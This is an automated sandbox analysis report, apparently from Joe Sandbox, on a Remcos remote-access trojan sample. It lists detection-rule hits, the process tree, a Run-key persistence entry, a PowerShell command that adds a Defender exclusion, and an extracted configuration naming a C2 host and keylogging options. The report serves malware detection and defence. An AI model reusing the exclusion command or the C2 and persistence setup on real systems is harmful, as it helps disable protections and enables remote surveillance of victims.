Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , ProcessId: 2920, ProcessName: wscript.exe
Source: Process started | Author: David Burkett, @signalblur | Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7248, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , ProcessId: 2920, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , ProcessId: 2920, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\Graias\graias.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\iGhDjzEiDU.exe, ProcessId: 2992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-O844B9
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\mstee.sys, NewProcessName: C:\Windows\System32\drivers\mstee.sys, OriginalFileName: C:\Windows\System32\drivers\mstee.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: mstee.sys
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iGhDjzEiDU.exe", ParentImage: C:\Users\user\Desktop\iGhDjzEiDU.exe, ParentProcessId: 6984, ParentProcessName: iGhDjzEiDU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", ProcessId: 1740, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7248, ProcessName: svchost.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs" , ProcessId: 2920, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iGhDjzEiDU.exe", ParentImage: C:\Users\user\Desktop\iGhDjzEiDU.exe, ParentProcessId: 6984, ParentProcessName: iGhDjzEiDU.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe", ProcessId: 1740, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Graias\graias.exe", ParentImage: C:\Users\user\AppData\Roaming\Graias\graias.exe, ParentProcessId: 7188, ParentProcessName: graias.exe, ProcessCommandLine: svchost.exe, ProcessId: 7248, ProcessName: svchost.exe

                Stealing of Sensitive Information

                Source: Registry Key set; Author: Joe Security; Data: Details: CC 5F EF 95 52 EC 1E E1 CA 3B DB 36 C6 90 98 6F F2 B2 EE 7D D9 55 DE 98 DA B0 14 BE 23 8B B2 A6 5E C6 CF 30 9C 82 F7 90 AE DF 71 5A C6 2D 2B ED 3E 5C 1B A5 E3 5D AE 39 5E 59 31 08 F4 CA E6 2B BA 34 A0 37 84 D9 A7 16 09 0E C6 14 B2 0C FB 58 78 BA B3 DF 78 0D 8C 08 09 07 A7 A5 D5 53 48 D3 1B 9D , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Graias\graias.exe, ProcessId: 7188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-O844B9\exepath
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2025-01-04T00:02:01.636826+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 185.234.72.215 | 4444 | TCP
                2025-01-04T00:02:02.270456+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 185.234.72.215 | 4444 | 192.168.2.4 | 49733 | TCP
                2025-01-04T00:02:03.166741+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 178.237.33.50 | 80 | TCP


                AV Detection

                Source: iGhDjzEiDU.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeAvira: detection malicious, Label: HEUR/AGEN.1309540
                Source: 00000008.00000002.2395821295.00000000011E7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["185.234.72.215:4444:0"], "Assigned name": "Graias", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "graias.exe", "Startup value": "Enable", "Hide file": "Enable", "Mutex": "Rmc-O844B9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Graias", "Keylog folder": "graias", "Keylog file max size": ""}
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeReversingLabs: Detection: 71%
                Source: iGhDjzEiDU.exeReversingLabs: Detection: 71%
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED
                Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeJoe Sandbox ML: detected
                Source: iGhDjzEiDU.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_0043294A
                Source: iGhDjzEiDU.exe, 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f5ba9315-5

                Exploits

                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.iGhDjzEiDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.43c65b8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.iGhDjzEiDU.exe.424d978.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 2992, type: MEMORYSTR

                Privilege Escalation

                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00406764 _wcslen,CoGetObject,5_2_00406764
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: iGhDjzEiDU.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: iGhDjzEiDU.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: BasicDisplay.pdb source: dxdiag.exe, 00000021.00000003.2105510977.0000000005721000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000021.00000003.2048401566.00000000031DF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: BasicDisplay.pdbUGP source: dxdiag.exe, 00000021.00000003.2105510977.0000000005721000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000021.00000003.2048401566.00000000031DF000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040B335
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,5_2_0041B43F
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040B53A
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,5_2_004089A9
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00406AC2 FindFirstFileW,FindNextFileW,5_2_00406AC2
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,5_2_00407A8C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00418C79
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,5_2_00408DA7
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_100010F1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0040AE51 FindFirstFileW,FindNextFileW,38_2_0040AE51
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,39_2_00407EF8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,41_2_00407898
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00406F06
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppDataJump to behavior

                Networking

                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49733 -> 185.234.72.215:4444
                Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 185.234.72.215:4444 -> 192.168.2.4:49733
                Source: Malware configuration extractorIPs: 185.234.72.215
                Source: global trafficTCP traffic: 192.168.2.4:49733 -> 185.234.72.215:4444
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 13.107.246.67 13.107.246.67
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49735 -> 178.237.33.50:80
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.215
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00426107 recv,5_2_00426107
                Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
                Source: chromecache_169.13.dr, chromecache_190.13.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
                Source: graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: graias.exe, graias.exe, 00000029.00000002.2092881288.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: graias.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
